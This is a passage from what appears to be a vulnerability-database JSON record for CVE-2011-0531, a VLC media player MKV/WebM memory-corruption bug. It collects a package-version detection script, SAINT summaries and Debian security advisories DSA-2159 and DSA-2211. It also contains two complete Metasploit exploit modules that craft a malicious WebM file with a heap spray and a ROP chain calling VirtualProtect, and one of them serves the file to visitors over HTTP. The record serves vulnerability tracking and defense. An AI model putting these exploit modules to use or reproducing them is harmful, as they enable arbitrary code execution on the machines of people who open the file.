streamer, could lead to the execution of arbitrary\ncode if a user is tricked into opening a malformed media file.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159.\n(CVE-2010-0522, CVE-2010-1441, CVE-2010-1442, CVE-2011-0531)\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.8-1.\n\nWe recommend that you upgrade your vlc packages.\";\ntag_summary = \"The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.\";\n\ntag_solution = 
\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202211-1\";\n\n\nif(description)\n{\n script_id(69555);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3275\", \"CVE-2010-3276\", \"CVE-2010-0522\", \"CVE-2010-1441\", \"CVE-2010-1442\", \"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2211-1 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libvlc0\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc0-dev\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"vlc-plugin-arts\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-esd\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-glide\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report 
+= res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "description": "Added: 06/27/2011 \nCVE: [CVE-2011-0531](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0531>) \nBID: [46060](<http://www.securityfocus.com/bid/46060>) \nOSVDB: [70698](<http://www.osvdb.org/70698>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVideoLan VLC 1.1.6.1 and earlier are vulnerable to a remote code execution vulnerability as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted `**MKV**` (`**Matroska**` or `**WebM**`) file. 
\n\n### Resolution\n\nUpgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available. \n\n### References\n\n<http://www.videolan.org/security/sa1102.html> \n\n\n### Limitations\n\nExploit works on VideoLAN VLC 1.1.0. \n\nThe user must open the exploit file on the target with a vulnerable version of VLC. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-06-27T00:00:00", "published": "2011-06-27T00:00:00", "id": "SAINT:FC3F8691377F5D2858A8DBCB8503CA3B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vlc_mkv_demuxer", "type": "saint", "title": "VideoLAN VLC Media Player MKV Demuxer Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "description": "Added: 06/27/2011 \nCVE: [CVE-2011-0531](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0531>) \nBID: [46060](<http://www.securityfocus.com/bid/46060>) \nOSVDB: [70698](<http://www.osvdb.org/70698>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVideoLan VLC 1.1.6.1 and earlier are vulnerable to a remote code execution vulnerability as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted `**MKV**` (`**Matroska**` or `**WebM**`) file. \n\n### Resolution\n\nUpgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available. \n\n### References\n\n<http://www.videolan.org/security/sa1102.html> \n\n\n### Limitations\n\nExploit works on VideoLAN VLC 1.1.0. \n\nThe user must open the exploit file on the target with a vulnerable version of VLC. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-06-27T00:00:00", "published": "2011-06-27T00:00:00", "id": "SAINT:406E0DD61EF13D202107AAD34919B826", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vlc_mkv_demuxer", "title": "VideoLAN VLC Media Player MKV Demuxer Code Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:08:37", "description": "VideoLAN VLC MKV Memory Corruption. CVE-2011-0531. Local exploit for windows platform", "published": "2011-02-08T00:00:00", "type": "exploitdb", "title": "VideoLAN VLC MKV Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "modified": "2011-02-08T00:00:00", "id": "EDB-ID:16637", "href": "https://www.exploit-db.com/exploits/16637/", "sourceData": "##\r\n# $Id: vlc_webm.rb 11725 2011-02-08 18:22:36Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'VideoLAN VLC MKV Memory Corruption',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an input validation error in VideoLAN VLC\r\n\t\t\t\t< 1.1.7. 
By creating a malicious MKV or WebM file, a remote attacker\r\n\t\t\t\tcould execute arbitrary code.\r\n\r\n\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\r\n\t\t\t\tpermanently enable NX support on machines that support it.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'Dan Rosenberg' ],\r\n\t\t\t'Version' => '$Revision: 11725 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '70698' ],\r\n\t\t\t\t\t[ 'CVE', '2011-0531' ],\r\n\t\t\t\t\t[ 'BID', '46060' ],\r\n\t\t\t\t\t[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.videolan.org/security/sa1102.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t=> 1024,\r\n\t\t\t\t\t'DisableNops'\t=> true,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'VLC 1.1.6 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'SprayTarget' => 0x030b030a,\r\n\t\t\t\t\t\t\t'Ret' => 0x6ce091b5,\t\t# Pointer to SprayTarget\r\n\t\t\t\t\t\t\t'Base' => 0x6cd00000,\t\t# Base of libtaglib_plugin.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jan 31, 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.webm']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\trop_base = target[\"Base\"]\r\n\t\tspray = target[\"SprayTarget\"]\r\n\r\n\t\t# EBML Header\r\n\t\tfile = \"\\x1A\\x45\\xDF\\xA3\"\t# EBML\r\n\t\tfile << \"\\x01\\x00\\x00\\x00\"\r\n\t\tfile << \"\\x00\\x00\\x00\\x1F\"\r\n\t\tfile << \"\\x42\\x86\\x81\\x01\"\t# EBMLVersion = 1\r\n\t\tfile << \"\\x42\\xF7\\x81\\x01\"\t# EBMLReadVersion = 1\r\n\t\tfile << \"\\x42\\xF2\\x81\\x04\"\t# EBMLMaxIDLength = 4\r\n\t\tfile << \"\\x42\\xF3\\x81\\x08\"\t# 
EBMLMaxSizeLength = 8\r\n\t\tfile << \"\\x42\\x82\\x84\\x77\"\t# DocType = \"webm\"\r\n\t\tfile << \"\\x65\\x62\\x6D\"\r\n\t\tfile << \"\\x42\\x87\\x81\\x02\"\t# DocTypeVersion = 2\r\n\t\tfile << \"\\x42\\x85\\x81\\x02\"\t# DocTypeReadVersion = 2\r\n\r\n\t\t# Segment data\r\n\t\tfile << \"\\x18\\x53\\x80\\x67\"\t# (0) Segment\r\n\t\tfile << \"\\x01\\x00\\x00\\x00\"\r\n\t\tfile << \"\\x01\\xD6\\x22\\xF1\"\r\n\r\n\t\t# Seek data\r\n\t\tfile << \"\\x11\\x4D\\x9B\\x74\"\t# (1) SeekHead\r\n\t\tfile << \"\\x40\\x3F\"\r\n\r\n\t\tfile << \"\\x4D\\xBB\\x8B\"\t\t# (2) Seek\r\n\t\tfile << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Segment Info\r\n\t\tfile << \"\\x15\\x49\\xA9\\x66\"\t#\r\n\r\n\t\tfile << \"\\x53\\xAC\\x81\"\t\t# (3) SeekPosition\r\n\t\tfile << \"\\xff\"\t\t\t# \tindex of segment info\r\n\r\n\t\t# Trigger the bug with an out-of-order element\r\n\t\tfile << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Tracks\r\n\t\tfile << \"\\x16\\x54\\xAE\\x6B\"\t#\r\n\r\n\t\tfile << \"\\x42\" * 228 \t\t# Padding\r\n\r\n\t\t# Data\r\n\t\tfile << \"\\x15\\x49\\xA9\\x66\"\t# (1) Segment Info\r\n\t\tfile << \"\\x01\\x00\\x00\\x00\"\t#\r\n\t\tfile << \"\\x01\\xff\\xff\\xff\"\t# This triggers our heap spray...\r\n\t\tfile << [target.ret].pack('V')\t# Pointer to our heap spray\r\n\t\r\n\t\t# The alignment plays nice, so EIP will always\r\n\t\t# hit our pivot when our heapspray works. 
ESI contains\r\n\t\t# 0x030b030a, which will point to one of our \"pop; retn\"\r\n\t\t# pointers, so this works as both a pivot and NOPsled\r\n\t\tblock = [\r\n\t\t\trop_base + 0x229a5,\t\t# xcgh esi,esp; retn\r\n\t\t\trop_base + 0x2c283,\t\t# pop eax; retn\r\n\t\t\t0xdeadbeef,\t\t\t# pad\r\n\t\t\trop_base + 0x2c283,\t\t# pop eax; retn\r\n\t\t]\r\n\t\tblock = block.pack('V*')\r\n\r\n\t\t# ROP payload\r\n\t\trop = [\r\n\t\t\trop_base + 0x1022,\t\t# retn\r\n\r\n\t\t\t# Call VirtualProtect()\r\n\t\t\trop_base + 0x2c283,\t\t# pop eax; retn\r\n\t\t\trop_base + 0x1212a4,\t\t# IAT entry for VirtualProtect -> eax\r\n\t\t\trop_base + 0x12fda,\t\t# mov eax,DWORD PTR [eax]\r\n\t\t\trop_base + 0x29d13,\t\t# jmp eax\r\n\r\n\t\t\trop_base + 0x1022,\t\t# retn\r\n\t\t\tspray & ~0xfff,\t\t\t# lpAddress\r\n\t\t\t0x60000,\t\t\t# dwSize\r\n\t\t\t0x40,\t\t\t\t# flNewProtect\r\n\t\t\tspray - 0x1000,\t\t\t# lpfOldProtect\r\n\r\n\t\t\t# Enough of this ROP business...\r\n\t\t\trop_base + 0xdace8 # push esp; retn\r\n\t\t]\r\n\t\trop = rop.pack('V*')\r\n\r\n\t\t# Overwrite the bad pointer with the address of an infinite\r\n\t\t# loop so the other threads spin instead of crashing\t\r\n\t\trop << \"\\xc7\\x05\"\r\n\t\trop << [spray + 0xc].pack('V')\r\n\t\trop << [rop_base + 0x1c070].pack('V')\t# mov DWORD PTR ds:[ptr],&loop\r\n\r\n\t\t# Restore the stack\r\n\t\trop << \"\\x87\\xe6\"\t\t\t# xchg esi,esp\r\n\r\n\t\t# Payload\r\n\t\trop << payload.encoded\r\n\r\n\t\t# We need to be 16-byte aligned\r\n\t\trop << \"\\xcc\" * (16 - rop.length % 16)\r\n\r\n\t\t# Heapspray and payload, go!\r\n\t\t32.times {\r\n\t\t\t0x3000.times {\r\n\t\t\t\tfile << block\r\n\t\t\t}\r\n\t\t\tfile << rop\r\n\t\t}\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(file)\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16637/"}], "securityvulns": 
[{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0531"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2159-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nFebruary 10, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : vlc\r\nVulnerability : missing input sanitising\r\nProblem type : (local)remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-0531\r\n\r\nDan Rosenberg discovered that insufficient input validation in VLC's \r\nprocessing of Matroska/WebM containers could lead to the execution of \r\narbitrary code. \r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.1.3-1squeeze3.\r\n\r\nThe version of vlc in the oldstable distribution (lenny) is affected\r\nby further issues and will be addressed in a followup DSA.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.1.7-1.\r\n\r\nWe recommend that you upgrade your vlc packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk1UayYACgkQXm3vHE4uylos6QCeLCU9ynXRns3mmNXdLlUHJcB3\r\nWMwAoMHS56Fvdn4AZYoaoAGulzacvtV1\r\n=ZweI\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25701", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25701", "title": "[SECURITY] [DSA 2159-1] vlc security update", "type": "securityvulns", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0531"], "description": "Memory corruption on Matroska/WebM \u0441ontainers parsing.", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:VULN:11425", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11425", "title": "VLC media player memory corruption", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:44", "description": "", "published": "2011-02-03T00:00:00", "type": "packetstorm", "title": "VideoLAN VLC MKV Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "modified": "2011-02-03T00:00:00", "id": "PACKETSTORM:98119", "href": "https://packetstormsecurity.com/files/98119/VideoLAN-VLC-MKV-Memory-Corruption.html", "sourceData": "`## \n# $Id: vlc_webm.rb 11692 2011-02-01 18:54:24Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'VideoLAN VLC MKV Memory Corruption', \n'Description' => %q{ \nThis module exploits an input validation error in VideoLAN VLC \n< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker \ncould execute arbitrary code. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'Dan Rosenberg' ], \n'Version' => '$Revision: 11692 $', \n'References' => \n[ \n[ 'OSVDB', '70698' ], \n[ 'CVE', '2011-0531' ], \n[ 'BID', '46060' ], \n[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ], \n[ 'URL', 'http://www.videolan.org/security/sa1102.html' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3', { 'Ret' => 0x05050505 } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 31, 2011', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# EBML Header \nfile = \"\\x1A\\x45\\xDF\\xA3\" # EBML \nfile << \"\\x01\\x00\\x00\\x00\" \nfile << \"\\x00\\x00\\x00\\x1F\" \nfile << \"\\x42\\x86\\x81\\x01\" # EBMLVersion = 1 \nfile << \"\\x42\\xF7\\x81\\x01\" # EBMLReadVersion = 1 \nfile << \"\\x42\\xF2\\x81\\x04\" # EBMLMaxIDLength = 4 \nfile << \"\\x42\\xF3\\x81\\x08\" # EBMLMaxSizeLength = 8 \nfile << \"\\x42\\x82\\x84\\x77\" # DocType = \"webm\" \nfile << \"\\x65\\x62\\x6D\" \nfile << \"\\x42\\x87\\x81\\x02\" # DocTypeVersion = 2 \nfile << \"\\x42\\x85\\x81\\x02\" # DocTypeReadVersion = 2 \n \n# Segment data \nfile << \"\\x18\\x53\\x80\\x67\" # (0) Segment \nfile << \"\\x01\\x00\\x00\\x00\" \nfile << \"\\x01\\xD6\\x22\\xF1\" \n \n# Seek data \nfile << \"\\x11\\x4D\\x9B\\x74\" # (1) SeekHead \nfile << \"\\x40\\x3F\" \n \nfile << \"\\x4D\\xBB\\x8B\" # (2) Seek \nfile << \"\\x53\\xAB\\x84\" # (3) SeekID = Segment Info \nfile << \"\\x15\\x49\\xA9\\x66\" # \n \nfile << \"\\x53\\xAC\\x81\" # (3) SeekPosition \nfile << \"\\xff\" # index of segment info \n \nfile << \"\\x53\\xAB\\x84\" # (3) SeekID = Tracks \nfile << \"\\x16\\x54\\xAE\\x6B\" # \n \nfile << \"\\x42\" * 228 # Padding \n \n# Data \nfile << 
\"\\x15\\x49\\xA9\\x66\" # (1) Segment Info \nfile << \"\\x01\\x00\\x00\\x00\" # \nfile << \"\\x01\\xff\\xff\\xff\" # This triggers our heap spray... \nfile << [target.ret].pack('V') # Object address \n \n# Spray the heap \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' }) \n \nhandler(cli) \n \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/98119/vlc_webm.rb.txt"}], "debian": [{"lastseen": "2020-11-11T13:23:47", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0531"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2159-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 10, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : vlc\nVulnerability : missing input sanitising\nProblem type : (local)remote\nDebian-specific: no\nCVE ID : CVE-2011-0531\n\nDan Rosenberg discovered that insufficient input validation in VLC's \nprocessing of Matroska/WebM containers could lead to the execution of \narbitrary code. 
\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.7-1.\n\nWe recommend that you upgrade your vlc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n\n\n", "edition": 3, "modified": "2011-02-10T22:49:43", "published": "2011-02-10T22:49:43", "id": "DEBIAN:DSA-2159-1:3FC9F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00024.html", "title": "[SECURITY] [DSA 2159-1] vlc security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:13:22", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2211-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 06, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : vlc\nVulnerability : missing input sanitising\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-3275 CVE-2010-3276\n\nRicardo Narvaja discovered that missing input sanitising in VLC, a \nmultimedia player and streamer, could lead to the execution of arbitrary \ncode if a user is tricked into opening a malformed media file.\n\nThis update also provides updated packages for oldstable (lenny) for \nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), 
either during the freeze or in DSA-2159.\n(CVE-2010-0522, CVE-2010-1441, CVE-2010-1442, CVE-2011-0531)\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.8-1.\n\nWe recommend that you upgrade your vlc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-04-06T21:51:11", "published": "2011-04-06T21:51:11", "id": "DEBIAN:DSA-2211-1:256DF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00080.html", "title": "[SECURITY] [DSA 2211-1] vlc security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T06:58:01", "description": "The version of VLC media player installed on the remote host is\nearlier than 1.1.7. 
